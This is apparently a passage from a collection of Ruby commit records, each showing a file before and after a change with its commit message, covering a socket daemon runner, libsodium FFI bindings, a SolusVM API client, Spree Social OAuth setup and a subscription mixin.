import_users(JSON.load(io))
end
zip.each do |entry|
# channel/2015-01-01.json
file_name = entry.name.clone.force_encoding('UTF-8')
if !File.directory?(dist + '/' + file_name) and file_name.split('/').size > 1
puts "import #{file_name}"
channel = Channels.find(name: file_name.split('/')[0]).to_a[0]
messages = JSON.load(entry.get_input_stream)
import_messages(channel, messages)
end
end
end
ensure
FileUtils.rm_r(dist)
end
end
end
|
require "logger"
require "socket"
require "fileutils"
require "sockd/errors"
module Sockd
class Runner
attr_reader :options, :name
class << self
def define(*args, &block)
self.new(*args, &block)
end
end
def initialize(name, options = {}, &block)
@name = name
@options = {
:host => "127.0.0.1",
:port => 0,
:socket => false,
:daemonize => true,
:pid_path => "/var/run/#{safe_name}.pid",
:log_path => false,
:force => false,
:user => nil,
:group => nil
}.merge(options)
[:setup, :teardown, :handle].each do |opt|
self.public_send(opt, &options[opt]) if options[opt].respond_to?(:call)
end
yield self if block_given?
end
# merge options when set with self.options = {...}
def options=(val)
@options.merge!(val)
end
# generate a path-safe and username-safe string from our daemon name
def safe_name
name.gsub(/(^[0-9]*|[^0-9a-z])/i, '')
end
# define a "setup" callback by providing a block, or trigger the callback
# @runner.setup { |opts| Server.new(...) }
def setup(&block)
return self if block_given? && @setup = block
@setup.call(self) if @setup
end
# define a "teardown" callback by providing a block, or trigger the callback
# @runner.teardown { log "shutting down" }
def teardown(&block)
return self if block_given? && @teardown = block
@teardown.call(self) if @teardown
end
# define our socket handler by providing a block, or trigger the callback
# with the provided message
# @runner.handle { |msg| if msg == 'foo' then return 'bar' ... }
def handle(message = nil, socket = nil, &block)
return self if block_given? && @handle = block
@handle || (raise SockdError, "No message handler provided.")
@handle.call(message, socket)
end
# call one of start, stop, restart, or send
def run(method, *args)
if %w(start stop restart send).include?(method)
begin
self.public_send method.to_sym, *args
rescue ArgumentError => e
raise unless e.backtrace[1].include? "in `public_send"
raise BadCommandError, "wrong number of arguments for command: #{method}"
end
else
raise BadCommandError, "invalid command: #{method}"
end
end
# start our service
def start
if options[:daemonize]
pid = daemon_running?
raise ProcError, "#{name} process already running (#{pid})" if pid
log "starting #{name} process..."
return self unless daemonize
end
drop_privileges options[:user], options[:group]
setup
on_interrupt do |signal|
log "#{signal} received, shutting down..."
teardown
exit 130
end
serve
end
# stop our service
def stop
if daemon_running?
pid = stored_pid
Process.kill('TERM', pid)
log "SIGTERM sent to #{name} (#{pid})"
if !wait_until(2) { daemon_stopped? pid } && options[:force]
Process.kill('KILL', pid)
log "SIGKILL sent to #{name} (#{pid})"
end
raise ProcError.new("unable to stop #{name} process") if daemon_running?
else
log "#{name} process not running"
end
self
end
# restart our service
def restart
stop
start
end
# send a message to a running service and return the response
def send(*args)
raise ArgumentError if args.empty?
message = args.join(' ')
response = nil
begin
client do |sock|
sock.write message + "\r\n"
response = sock.gets
end
rescue Errno::ECONNREFUSED, Errno::ENOENT
unless daemon_running?
abort "#{name} process not running"
end
abort "unable to establish connection"
end
puts response
end
protected
# run a server loop, passing data off to our handler
def serve
server do |server|
log "listening on " + server.local_address.inspect_sockaddr
while 1
sock = server.accept
begin
# wait for input
if IO.select([sock], nil, nil, 2.0)
msg = sock.recv(256, Socket::MSG_PEEK)
if msg.chomp == "ping"
sock.print "pong\r\n"
else
handle msg, sock
end
else
log "connection timed out"
end
rescue Errno::EPIPE, Errno::ECONNRESET
log "connection broken"
end
sock.close unless sock.closed?
end
end
end
# return a UNIXServer or TCPServer instance depending on config
def server(&block)
if options[:socket]
UNIXServer.open(options[:socket], &block)
else
TCPServer.open(options[:host], options[:port], &block)
end
rescue Errno::EACCES
sock = options[:socket] || "#{options[:host]}:#{options[:port]}"
raise ProcError, "unable to open socket: #{sock} (check permissions)"
end
# return a UNIXSocket or TCPSocket instance depending on config
def client(&block)
if options[:socket]
UNIXSocket.open(options[:socket], &block)
else
TCPSocket.open(options[:host], options[:port], &block)
end
rescue Errno::EACCES
sock = options[:socket] || "#{options[:host]}:#{options[:port]}"
raise ProcError, "unable to open socket: #{sock} (check permissions)"
end
# handle process termination signals
def on_interrupt(&block)
trap("INT") { yield "SIGINT" }
trap("QUIT") { yield "SIGQUIT" }
trap("TERM") { yield "SIGTERM" }
end
# daemonize a process. returns true from the forked process, false otherwise
def daemonize
# ensure pid file and log file are writable if provided
pid_path = options[:pid_path] ? writable_file(options[:pid_path]) : nil
log_path = options[:log_path] ? writable_file(options[:log_path]) : nil
unless fork
Process.setsid
exit if fork
File.umask 0000
Dir.chdir "/"
# save pid file
File.open(pid_path, 'w') { |f| f.write Process.pid } if pid_path
# redirect our io
setup_logging(log_path)
# trap and ignore SIGHUP
Signal.trap('HUP') {}
# trap reopen our log files on SIGUSR1
Signal.trap('USR1') { setup_logging(log_path) }
return true
end
Process.waitpid
unless wait_until { daemon_running? }
raise ProcError, "failed to start #{@name} service"
end
end
# returns the process id if a daemon is running with our pid file
def daemon_running?(pid = nil)
pid ||= stored_pid
Process.kill(0, pid) if pid
pid
rescue Errno::ESRCH
false
end
# reverse of daemon_running?
def daemon_stopped?(pid = nil)
!daemon_running? pid
end
# drop privileges to the specified user and group
def drop_privileges(user, group)
uid = Etc.getpwnam(user).uid if user
gid = Etc.getgrnam(group).gid if group
gid = Etc.getpwnam(user).gid if group.nil? && user
Process::Sys.setuid(uid) if uid
Process::Sys.setgid(gid) if gid
rescue ArgumentError => e
# user or group does not exist
raise ProcError, "unable to drop privileges (#{e})"
end
# redirect our output as per configuration
def setup_logging(log_path)
log_path ||= '/dev/null'
$stdin.reopen '/dev/null'
$stdout.reopen(log_path, 'a')
$stderr.reopen $stdout
$stdout.sync = true
end
# returns the pid stored in our pid_path
def stored_pid
return false unless options[:pid_path]
path = File.expand_path(options[:pid_path])
return false unless File.file?(path) && !File.zero?(path)
File.read(path).chomp.to_i
end
# ensure a writable file exists at the specified path
def writable_file(path)
path = File.expand_path(path)
begin
FileUtils.mkdir_p(File.dirname(path), :mode => 0755)
FileUtils.touch path
File.chmod(0644, path)
rescue Errno::EACCES, Errno::EISDIR
end
unless File.file?(path) && File.writable?(path)
raise ProcError, "unable to open file: #{path} (check permissions)"
end
path
end
def wait_until(timer = 5, interval = 0.1, &block)
until timer < 0 or block.call
timer -= interval
sleep interval
end
timer > 0
end
def log(message)
puts Time.now.strftime('%Y-%m-%d %H:%M:%S: ') + message
end
end
end
clean up open unix sockets when exiting
require "logger"
require "socket"
require "fileutils"
require "sockd/errors"
module Sockd
class Runner
attr_reader :options, :name
class << self
def define(*args, &block)
self.new(*args, &block)
end
end
def initialize(name, options = {}, &block)
@name = name
@options = {
:host => "127.0.0.1",
:port => 0,
:socket => false,
:daemonize => true,
:pid_path => "/var/run/#{safe_name}.pid",
:log_path => false,
:force => false,
:user => nil,
:group => nil
}.merge(options)
[:setup, :teardown, :handle].each do |opt|
self.public_send(opt, &options[opt]) if options[opt].respond_to?(:call)
end
yield self if block_given?
end
# merge options when set with self.options = {...}
def options=(val)
@options.merge!(val)
end
# generate a path-safe and username-safe string from our daemon name
def safe_name
name.gsub(/(^[0-9]*|[^0-9a-z])/i, '')
end
# define a "setup" callback by providing a block, or trigger the callback
# @runner.setup { |opts| Server.new(...) }
def setup(&block)
return self if block_given? && @setup = block
@setup.call(self) if @setup
end
# define a "teardown" callback by providing a block, or trigger the callback
# @runner.teardown { log "shutting down" }
def teardown(&block)
return self if block_given? && @teardown = block
@teardown.call(self) if @teardown
end
# define our socket handler by providing a block, or trigger the callback
# with the provided message
# @runner.handle { |msg| if msg == 'foo' then return 'bar' ... }
def handle(message = nil, socket = nil, &block)
return self if block_given? && @handle = block
@handle || (raise SockdError, "No message handler provided.")
@handle.call(message, socket)
end
# call one of start, stop, restart, or send
def run(method, *args)
if %w(start stop restart send).include?(method)
begin
self.public_send method.to_sym, *args
rescue ArgumentError => e
raise unless e.backtrace[1].include? "in `public_send"
raise BadCommandError, "wrong number of arguments for command: #{method}"
end
else
raise BadCommandError, "invalid command: #{method}"
end
end
# start our service
def start
if options[:daemonize]
pid = daemon_running?
raise ProcError, "#{name} process already running (#{pid})" if pid
log "starting #{name} process..."
return self unless daemonize
end
drop_privileges options[:user], options[:group]
setup
on_interrupt do |signal|
log "#{signal} received, shutting down..."
teardown
cleanup
exit 130
end
serve
end
# stop our service
def stop
if daemon_running?
pid = stored_pid
Process.kill('TERM', pid)
log "SIGTERM sent to #{name} (#{pid})"
if !wait_until(2) { daemon_stopped? pid } && options[:force]
Process.kill('KILL', pid)
log "SIGKILL sent to #{name} (#{pid})"
end
raise ProcError.new("unable to stop #{name} process") if daemon_running?
else
log "#{name} process not running"
end
self
end
# restart our service
def restart
stop
start
end
# send a message to a running service and return the response
def send(*args)
raise ArgumentError if args.empty?
message = args.join(' ')
response = nil
begin
client do |sock|
sock.write message + "\r\n"
response = sock.gets
end
rescue Errno::ECONNREFUSED, Errno::ENOENT
unless daemon_running?
abort "#{name} process not running"
end
abort "unable to establish connection"
end
puts response
end
protected
# run a server loop, passing data off to our handler
def serve
server do |server|
log "listening on " + server.local_address.inspect_sockaddr
while 1
sock = server.accept
begin
# wait for input
if IO.select([sock], nil, nil, 2.0)
msg = sock.recv(256, Socket::MSG_PEEK)
if msg.chomp == "ping"
sock.print "pong\r\n"
else
handle msg, sock
end
else
log "connection timed out"
end
rescue Errno::EPIPE, Errno::ECONNRESET
log "connection broken"
end
sock.close unless sock.closed?
end
end
end
# return a UNIXServer or TCPServer instance depending on config
def server(&block)
if options[:socket]
UNIXServer.open(options[:socket], &block)
else
TCPServer.open(options[:host], options[:port], &block)
end
rescue Errno::EACCES
sock = options[:socket] || "#{options[:host]}:#{options[:port]}"
raise ProcError, "unable to open socket: #{sock} (check permissions)"
end
# return a UNIXSocket or TCPSocket instance depending on config
def client(&block)
if options[:socket]
UNIXSocket.open(options[:socket], &block)
else
TCPSocket.open(options[:host], options[:port], &block)
end
rescue Errno::EACCES
sock = options[:socket] || "#{options[:host]}:#{options[:port]}"
raise ProcError, "unable to open socket: #{sock} (check permissions)"
end
# clean up UNIXSocket upon termination
def cleanup
if options[:socket] && File.exists?(options[:socket])
File.delete(options[:socket])
end
rescue StandardError
raise ProcError, "unable to unlink socket: #{options[:socket]} (check permissions)"
end
# handle process termination signals
def on_interrupt(&block)
trap("INT") { yield "SIGINT" }
trap("QUIT") { yield "SIGQUIT" }
trap("TERM") { yield "SIGTERM" }
end
# daemonize a process. returns true from the forked process, false otherwise
def daemonize
# ensure pid file and log file are writable if provided
pid_path = options[:pid_path] ? writable_file(options[:pid_path]) : nil
log_path = options[:log_path] ? writable_file(options[:log_path]) : nil
unless fork
Process.setsid
exit if fork
File.umask 0000
Dir.chdir "/"
# save pid file
File.open(pid_path, 'w') { |f| f.write Process.pid } if pid_path
# redirect our io
setup_logging(log_path)
# trap and ignore SIGHUP
Signal.trap('HUP') {}
# trap reopen our log files on SIGUSR1
Signal.trap('USR1') { setup_logging(log_path) }
return true
end
Process.waitpid
unless wait_until { daemon_running? }
raise ProcError, "failed to start #{@name} service"
end
end
# returns the process id if a daemon is running with our pid file
def daemon_running?(pid = nil)
pid ||= stored_pid
Process.kill(0, pid) if pid
pid
rescue Errno::ESRCH
false
end
# reverse of daemon_running?
def daemon_stopped?(pid = nil)
!daemon_running? pid
end
# drop privileges to the specified user and group
def drop_privileges(user, group)
uid = Etc.getpwnam(user).uid if user
gid = Etc.getgrnam(group).gid if group
gid = Etc.getpwnam(user).gid if group.nil? && user
Process::Sys.setuid(uid) if uid
Process::Sys.setgid(gid) if gid
rescue ArgumentError => e
# user or group does not exist
raise ProcError, "unable to drop privileges (#{e})"
end
# redirect our output as per configuration
def setup_logging(log_path)
log_path ||= '/dev/null'
$stdin.reopen '/dev/null'
$stdout.reopen(log_path, 'a')
$stderr.reopen $stdout
$stdout.sync = true
end
# returns the pid stored in our pid_path
def stored_pid
return false unless options[:pid_path]
path = File.expand_path(options[:pid_path])
return false unless File.file?(path) && !File.zero?(path)
File.read(path).chomp.to_i
end
# ensure a writable file exists at the specified path
def writable_file(path)
path = File.expand_path(path)
begin
FileUtils.mkdir_p(File.dirname(path), :mode => 0755)
FileUtils.touch path
File.chmod(0644, path)
rescue Errno::EACCES, Errno::EISDIR
end
unless File.file?(path) && File.writable?(path)
raise ProcError, "unable to open file: #{path} (check permissions)"
end
path
end
def wait_until(timer = 5, interval = 0.1, &block)
until timer < 0 or block.call
timer -= interval
sleep interval
end
timer > 0
end
def log(message)
puts Time.now.strftime('%Y-%m-%d %H:%M:%S: ') + message
end
end
end
|
require 'sodium'
require 'ffi'
module Sodium::NaCl
def self.nacl_default(klass, primitive)
klass.const_set(:DEFAULT, primitive)
end
def self.nacl_family(scope, subclass, implementation)
klass = _define_subclass(scope, subclass)
family = _extract_family_name(scope)
primitive = subclass.to_s.downcase.to_sym
methods = {}
constants = {
:implementation => implementation,
:primitive => primitive
}
yield methods, constants
_install_implementation scope, klass, primitive
_install_constants klass, family, primitive, implementation, constants
_install_methods klass, family, primitive, implementation, methods
end
def self._define_subclass(scope, name)
scope.const_set name, Class.new(scope)
end
def self._extract_family_name(klass)
'crypto_' + klass.name.split('::').last.downcase
end
def self._install_implementation(scope, klass, primitive)
scope.implementations[primitive] = klass
end
def self._install_constants(klass, family, primitive, implementation, constants)
constants.each do |name, value|
family = family.to_s.upcase
name = name.to_s.upcase
self. const_set("#{family}_#{primitive}_#{name}", value)
klass.const_set(name, value)
end
end
def self._install_methods(klass, family, primitive, implementation, methods)
methods.each do |name, arguments|
nacl = self
imp = [ family, primitive, implementation, name ].compact.join('_')
meth = [ 'nacl', name ].compact.join('_')
self.attach_function imp, arguments[0..-2], arguments.last
(class << klass; self; end).send(:define_method, meth) do |*a, &b|
nacl.send(imp, *a, &b) == 0
end
end
end
end
module Sodium::NaCl
extend FFI::Library
ffi_lib 'sodium'
nacl_default Sodium::Auth, :hmacsha512256
nacl_family Sodium::Auth, :HMACSHA256, :ref do |methods, constants|
constants[:version] = '-'
constants[:bytes] = 32
constants[:keybytes] = 32
methods[nil] = [ :pointer, :pointer, :ulong_long, :pointer, :int ]
methods[:verify] = [ :pointer, :pointer, :ulong_long, :pointer, :int ]
end
nacl_family Sodium::Auth, :HMACSHA512256, :ref do |methods, constants|
constants[:version] = '-'
constants[:bytes] = 32
constants[:keybytes] = 32
methods[nil] = [ :pointer, :pointer, :ulong_long, :pointer, :int ]
methods[:verify] = [ :pointer, :pointer, :ulong_long, :pointer, :int ]
end
nacl_default Sodium::Box, :curve25519xsalsa20poly1305
nacl_family Sodium::Box, :Curve25519XSalsa20Poly1305, :ref do |methods, constants|
constants[:version] = '-'
constants[:publickeybytes] = 32
constants[:secretkeybytes] = 32
constants[:beforenmbytes] = 32
constants[:noncebytes] = 24
constants[:zerobytes] = 32
constants[:boxzerobytes] = 16
constants[:macbytes] = 16
methods[nil] = [ :pointer, :pointer, :ulong_long, :pointer, :pointer, :pointer, :int ]
methods[:open] = [ :pointer, :pointer, :ulong_long, :pointer, :pointer, :pointer, :int ]
methods[:keypair] = [ :pointer, :pointer, :int ]
methods[:beforenm] = [ :pointer, :pointer, :pointer, :int ]
methods[:afternm] = [ :pointer, :pointer, :ulong_long, :pointer, :pointer, :int ]
methods[:open_afternm] = [ :pointer, :pointer, :ulong_long, :pointer, :pointer, :int ]
end
end
More cleanup
require 'sodium'
require 'ffi'
module Sodium::NaCl
def self.nacl_default(klass, primitive)
klass.const_set(:DEFAULT, primitive)
end
def self.nacl_family(scope, subclass, implementation)
klass = _define_subclass(scope, subclass)
family = _extract_family_name(scope)
primitive = subclass.to_s.downcase.to_sym
methods = {}
constants = {
:implementation => implementation,
:primitive => primitive
}
yield constants, methods
_install_implementation scope, klass, primitive
_install_constants klass, family, primitive, implementation, constants
_install_methods klass, family, primitive, implementation, methods
end
def self._define_subclass(scope, name)
scope.const_set name, Class.new(scope)
end
def self._extract_family_name(klass)
'crypto_' + klass.name.split('::').last.downcase
end
def self._install_implementation(scope, klass, primitive)
scope.implementations[primitive] = klass
end
def self._install_constants(klass, family, primitive, implementation, constants)
constants.each do |name, value|
family = family.to_s.upcase
name = name.to_s.upcase
self. const_set("#{family}_#{primitive}_#{name}", value)
klass.const_set(name, value)
end
end
def self._install_methods(klass, family, primitive, implementation, methods)
methods.each do |name, arguments|
nacl = self
imp = [ family, primitive, implementation, name ].compact.join('_')
meth = [ 'nacl', name ].compact.join('_')
self.attach_function imp, arguments[0..-2], arguments.last
(class << klass; self; end).send(:define_method, meth) do |*a, &b|
nacl.send(imp, *a, &b) == 0
end
end
end
end
module Sodium::NaCl
extend FFI::Library
ffi_lib 'sodium'
nacl_family Sodium::Auth, :HMACSHA256, :ref do |constants, methods|
constants.update(
:version => '-',
:bytes => 32,
:keybytes => 32
)
methods.update(
nil => [ :pointer, :pointer, :ulong_long, :pointer, :int ],
:verify => [ :pointer, :pointer, :ulong_long, :pointer, :int ]
)
end
nacl_family Sodium::Auth, :HMACSHA512256, :ref do |constants, methods|
constants.update(
:version => '-',
:bytes => 32,
:keybytes => 32
)
methods.update(
nil => [ :pointer, :pointer, :ulong_long, :pointer, :int ],
:verify => [ :pointer, :pointer, :ulong_long, :pointer, :int ]
)
end
nacl_family Sodium::Box, :Curve25519XSalsa20Poly1305, :ref do |constants, methods|
constants.update(
:version => '-',
:publickeybytes => 32,
:secretkeybytes => 32,
:beforenmbytes => 32,
:noncebytes => 24,
:zerobytes => 32,
:boxzerobytes => 16,
:macbytes => 16,
)
methods.update(
nil => [ :pointer, :pointer, :ulong_long, :pointer, :pointer, :pointer, :int ],
:open => [ :pointer, :pointer, :ulong_long, :pointer, :pointer, :pointer, :int ],
:keypair => [ :pointer, :pointer, :int ],
:beforenm => [ :pointer, :pointer, :pointer, :int ],
:afternm => [ :pointer, :pointer, :ulong_long, :pointer, :pointer, :int ],
:open_afternm => [ :pointer, :pointer, :ulong_long, :pointer, :pointer, :int ],
)
end
nacl_default Sodium::Auth, :hmacsha512256
nacl_default Sodium::Box, :curve25519xsalsa20poly1305
end
|
module Solusvm
# Solusvm::Base is the main class for mapping API resources as subclasses.
class Base
VALID_SERVER_TYPES = ["openvz", "xen", "xen hvm"]
attr_reader :returned_parameters
# Prepares and sends the API request to the URL specificed in Solusvm.config
#
# class MyClass < Base
# def create_server(name)
# perform_request(:action => "name", :id => 1)
# end
# end
#
# Options:
# * <tt>:action</tt> - Specifies which API method to execute
# All other options passed in are converted to http query arguments and are passed along to the API
#
# <tt>force_array</tt> - see parse_response
def perform_request(options = {}, force_array = false)
ca_path = File.join(File.dirname(__FILE__), "..", "cacert.pem")
ssl = {verify: true, ca_file: File.expand_path(ca_path)}
response = Faraday.new(url: api_endpoint, ssl: ssl) do |c|
c.params = options.merge(api_login)
c.adapter :net_http
end.get
@returned_parameters = parse_response(response.status, response.body, force_array)
log_messages(options)
successful?
end
# Converts the XML response to a Hash
#
# <tt>force_array</tt> - Parses the xml element as an array; can be a string with the element name
# or an array with element names
def parse_response(status, body, force_array = false)
parse_error(status, body) || begin
force_array = Array(force_array) if force_array
body = "<solusrequest>#{body}</solusrequest>"
XmlSimple.xml_in(body, "ForceArray" => force_array)
end
end
# Parses a returned_parameters value as a list, if present.
def parse_returned_params_as_list(attribute)
if returned_parameters[attribute] && !returned_parameters[attribute].empty?
returned_parameters[attribute].to_s.split(",")
end
end
# Parses error responses.
def parse_error(status, body)
if (200..299).include?(status)
# Checks for application errors
case body.downcase
when /invalid ipaddress/i
{ "status" => "error", "statusmsg" => "This IP is not authorized to use the API" }
when /Invalid id or key/i
{ "status" => "error", "statusmsg" => "Invalid ID or key" }
when /Node not found/i
{ "status" => "error", "statusmsg" => "Node does not exist" }
end
else
{ "status" => "error", "statusmsg" => "Bad HTTP Status: #{status}" }
end
end
# Returns true when a request has been successful
#
# my_class = MyClass.new
# my_class.create_server("example.com")
# my_class.successful? # => true
def successful?
returned_parameters["status"].nil? || returned_parameters["status"] == "success"
end
# URI parsed API URL
def api_endpoint
Solusvm.api_endpoint.dup
end
def api_login
{id: Solusvm.api_id, key: Solusvm.api_key}
end
def log_messages(options)
logger, logger_method = Solusvm.api_options[:logger], Solusvm.api_options[:logger_method]
if logger && logger.respond_to?(logger_method)
logger.send(logger_method, "[Start] => #{options[:action]}")
returned_parameters.each do |k,v|
logger.send(logger_method, " #{k} => #{v}")
end
logger.send(logger_method, "[End] => #{options[:action]}")
end
end
# API response message
def statusmsg
returned_parameters["statusmsg"]
end
# Validates the server type.
def validate_server_type(type, &block)
type = type.strip
if valid = VALID_SERVER_TYPES.include?(type)
yield
else
@returned_parameters = {
"status" => "error",
"statusmsg" => "Invalid Virtual Server type: #{type}"
}
false
end
end
end
end
remove unused variable
module Solusvm
# Solusvm::Base is the main class for mapping API resources as subclasses.
class Base
VALID_SERVER_TYPES = ["openvz", "xen", "xen hvm"]
attr_reader :returned_parameters
# Prepares and sends the API request to the URL specificed in Solusvm.config
#
# class MyClass < Base
# def create_server(name)
# perform_request(:action => "name", :id => 1)
# end
# end
#
# Options:
# * <tt>:action</tt> - Specifies which API method to execute
# All other options passed in are converted to http query arguments and are passed along to the API
#
# <tt>force_array</tt> - see parse_response
def perform_request(options = {}, force_array = false)
ca_path = File.join(File.dirname(__FILE__), "..", "cacert.pem")
ssl = {verify: true, ca_file: File.expand_path(ca_path)}
response = Faraday.new(url: api_endpoint, ssl: ssl) do |c|
c.params = options.merge(api_login)
c.adapter :net_http
end.get
@returned_parameters = parse_response(response.status, response.body, force_array)
log_messages(options)
successful?
end
# Converts the XML response to a Hash
#
# <tt>force_array</tt> - Parses the xml element as an array; can be a string with the element name
# or an array with element names
def parse_response(status, body, force_array = false)
parse_error(status, body) || begin
force_array = Array(force_array) if force_array
body = "<solusrequest>#{body}</solusrequest>"
XmlSimple.xml_in(body, "ForceArray" => force_array)
end
end
# Parses a returned_parameters value as a list, if present.
def parse_returned_params_as_list(attribute)
if returned_parameters[attribute] && !returned_parameters[attribute].empty?
returned_parameters[attribute].to_s.split(",")
end
end
# Parses error responses.
def parse_error(status, body)
if (200..299).include?(status)
# Checks for application errors
case body.downcase
when /invalid ipaddress/i
{ "status" => "error", "statusmsg" => "This IP is not authorized to use the API" }
when /Invalid id or key/i
{ "status" => "error", "statusmsg" => "Invalid ID or key" }
when /Node not found/i
{ "status" => "error", "statusmsg" => "Node does not exist" }
end
else
{ "status" => "error", "statusmsg" => "Bad HTTP Status: #{status}" }
end
end
# Returns true when a request has been successful
#
# my_class = MyClass.new
# my_class.create_server("example.com")
# my_class.successful? # => true
def successful?
returned_parameters["status"].nil? || returned_parameters["status"] == "success"
end
# URI parsed API URL
def api_endpoint
Solusvm.api_endpoint.dup
end
def api_login
{id: Solusvm.api_id, key: Solusvm.api_key}
end
def log_messages(options)
logger, logger_method = Solusvm.api_options[:logger], Solusvm.api_options[:logger_method]
if logger && logger.respond_to?(logger_method)
logger.send(logger_method, "[Start] => #{options[:action]}")
returned_parameters.each do |k,v|
logger.send(logger_method, " #{k} => #{v}")
end
logger.send(logger_method, "[End] => #{options[:action]}")
end
end
# API response message
def statusmsg
returned_parameters["statusmsg"]
end
# Validates the server type.
def validate_server_type(type, &block)
type = type.strip
if VALID_SERVER_TYPES.include?(type)
yield
else
@returned_parameters = {
"status" => "error",
"statusmsg" => "Invalid Virtual Server type: #{type}"
}
false
end
end
end
end
|
require 'spree_core'
require 'spree_auth'
require 'omniauth/oauth'
require "spree_social_hooks"
module SpreeSocial
OAUTH_PROVIDERS = [
["Bit.ly", "bitly"], ["Evernote", "evernote"], ["Facebook", "facebook"], ["Foursquare", "foursquare"],
["Github", "github"], ["Google", "google"] , ["Gowalla", "gowalla"], ["instagr.am", "instagram"],
["Instapaper", "instapaper"], ["LinkedIn", "linked_in"], ["37Signals (Basecamp, Campfire, etc)", "thirty_seven_signals"],
["Twitter", "twitter"], ["Vimeo", "vimeo"], ["Yahoo!", "yahoo"], ["YouTube", "you_tube"]
]
class Engine < Rails::Engine
def self.activate
Dir.glob(File.join(File.dirname(__FILE__), "../app/**/*_decorator*.rb")) do |c|
Rails.env.production? ? require(c) : load(c)
end
Ability.register_ability(SocialAbility)
end
config.to_prepare &method(:activate).to_proc
end
# We are setting these providers up regardless
# This way we can update them when and where necessary
def self.init_provider(provider)
key, secret = nil
AuthenticationMethod.where(:environment => ::Rails.env).each do |user|
if user.preferred_provider == provider
key = user.preferred_api_key
secret = user.preferred_api_secret
puts("[Spree Social] Loading #{user.preferred_provider.capitalize} as authentication source")
end
end if self.table_exists?("authentication_methods") # See Below for explanation
self.setup_key_for(provider.to_sym, key, secret)
end
def self.setup_key_for(provider, key, secret)
Devise.setup do |oa|
oa.omniauth provider.to_sym, key, secret
end
end
# Coming soon to a server near you: no restart to get new keys setup
#def self.reset_key_for(provider, *args)
# puts "ARGS: #{args}"
# Devise.omniauth_configs[provider] = Devise::OmniAuth::Config.new(provider, args)
# #oa_updated_provider
# #Devise.omniauth_configs.merge!(oa_updated_provider)
# puts "OmniAuth #{provider}: #{Devise.omniauth_configs[provider.to_sym].inspect}"
#end
private
# Have to test for this cause Rails migrations and initial setups will fail
def self.table_exists?(name)
ActiveRecord::Base.connection.tables.include?(name)
end
end
Update spree_social.rb
require 'spree_core'
require 'spree_auth'
require 'omniauth/oauth'
require "spree_social_hooks"
module SpreeSocial
OAUTH_PROVIDERS = [
["Bit.ly", "bitly"], ["Evernote", "evernote"], ["Facebook", "facebook"], ["Foursquare", "foursquare"],
["Github", "github"], ["Google", "google"] , ["Gowalla", "gowalla"], ["instagr.am", "instagram"],
["Instapaper", "instapaper"], ["LinkedIn", "linked_in"], ["37Signals (Basecamp, Campfire, etc)", "thirty_seven_signals"],
["Twitter", "twitter"], ["Vimeo", "vimeo"], ["Yahoo!", "yahoo"], ["YouTube", "you_tube"],
["Vkontakte", "vkontakte"]
]
class Engine < Rails::Engine
def self.activate
Dir.glob(File.join(File.dirname(__FILE__), "../app/**/*_decorator*.rb")) do |c|
Rails.env.production? ? require(c) : load(c)
end
Ability.register_ability(SocialAbility)
end
config.to_prepare &method(:activate).to_proc
end
# We are setting these providers up regardless
# This way we can update them when and where necessary
def self.init_provider(provider)
key, secret = nil
AuthenticationMethod.where(:environment => ::Rails.env).each do |user|
if user.preferred_provider == provider
key = user.preferred_api_key
secret = user.preferred_api_secret
puts("[Spree Social] Loading #{user.preferred_provider.capitalize} as authentication source")
end
end if self.table_exists?("authentication_methods") # See Below for explanation
self.setup_key_for(provider.to_sym, key, secret)
end
def self.setup_key_for(provider, key, secret)
Devise.setup do |oa|
oa.omniauth provider.to_sym, key, secret
end
end
# Coming soon to a server near you: no restart to get new keys setup
#def self.reset_key_for(provider, *args)
# puts "ARGS: #{args}"
# Devise.omniauth_configs[provider] = Devise::OmniAuth::Config.new(provider, args)
# #oa_updated_provider
# #Devise.omniauth_configs.merge!(oa_updated_provider)
# puts "OmniAuth #{provider}: #{Devise.omniauth_configs[provider.to_sym].inspect}"
#end
private
# Have to test for this cause Rails migrations and initial setups will fail
def self.table_exists?(name)
ActiveRecord::Base.connection.tables.include?(name)
end
end
|
module Subscribable
def self.included klass
klass.class_eval do
has_many :subscriptions, :as => :subscribable, :dependent => :destroy, :autosave => true
before_create :set_default_subscriptions
extend ClassMethods
end
end
def current_users_subscription
subscriptions.detect { |ss| ss.person == User.current_user.person }
end
def subscribed?
!current_users_subscription.nil?
end
def subscribed= subscribed
if subscribed
subscribe
else
unsubscribe
end
end
def subscribe
subscriptions.build :person => User.current_user.person, :project => project unless subscribed?
end
def unsubscribe
current_users_subscription.try(:destroy)
end
def send_immediate_subscriptions activity_log
subscriptions.each do |subscription|
if subscription.immediately? and subscribers_are_notified_of? activity_log.action
SubMailer.deliver_send_immediate_subscription subscription.person, activity_log
end
end
end
def subscribers_are_notified_of? action
self.class.subscribers_are_notified_of? action
end
def set_default_subscriptions
Person.all.each do |person|
if project_subscription = person.project_subscriptions.detect {|s| s.project == self.project}
subscriptions.build :person => person unless project_subscription.unsubscribed_types.include? self.class.name
end
end
end
module ClassMethods
def subscribers_are_notified_of? action
action != 'show' and action != 'download'
end
end
end
ActiveRecord::Base.class_eval do
def self.subscribable?
include? Subscribable
end
def subscribable?
self.class.subscribable?
end
end
corrected typo in method name
module Subscribable
def self.included klass
klass.class_eval do
has_many :subscriptions, :as => :subscribable, :dependent => :destroy, :autosave => true
before_create :set_default_subscriptions
extend ClassMethods
end
end
def current_users_subscription
subscriptions.detect { |ss| ss.person == User.current_user.person }
end
def subscribed?
!current_users_subscription.nil?
end
def subscribed= subscribed
if subscribed
subscribe
else
unsubscribe
end
end
def subscribe
subscriptions.build :person => User.current_user.person, :project => project unless subscribed?
end
def unsubscribe
current_users_subscription.try(:destroy)
end
def send_immediate_subscription activity_log
subscriptions.each do |subscription|
if subscription.immediately? and subscribers_are_notified_of? activity_log.action
SubMailer.deliver_send_immediate_subscription subscription.person, activity_log
end
end
end
def subscribers_are_notified_of? action
self.class.subscribers_are_notified_of? action
end
def set_default_subscriptions
Person.all.each do |person|
if project_subscription = person.project_subscriptions.detect {|s| s.project == self.project}
subscriptions.build :person => person unless project_subscription.unsubscribed_types.include? self.class.name
end
end
end
module ClassMethods
def subscribers_are_notified_of? action
action != 'show' and action != 'download'
end
end
end
ActiveRecord::Base.class_eval do
def self.subscribable?
include? Subscribable
end
def subscribable?
self.class.subscribable?
end
end |
puts __FILE__ if defined?(DEBUG)
desc 'commits source files to git or subversion'
if(File.exists?('git'))
task :commit=>[:add] do Tasks.execute_task :commit; end
else
task :commit=>[:add] do Tasks.execute_task :commit;end
end
class Commit < Array
def update
message=""
message=IO.read('commit.message').strip if File.exists?('commit.message')
if(File.exists?('.git') && `git config --list`.include?('user.name=') && Git.user_email.length > 0)
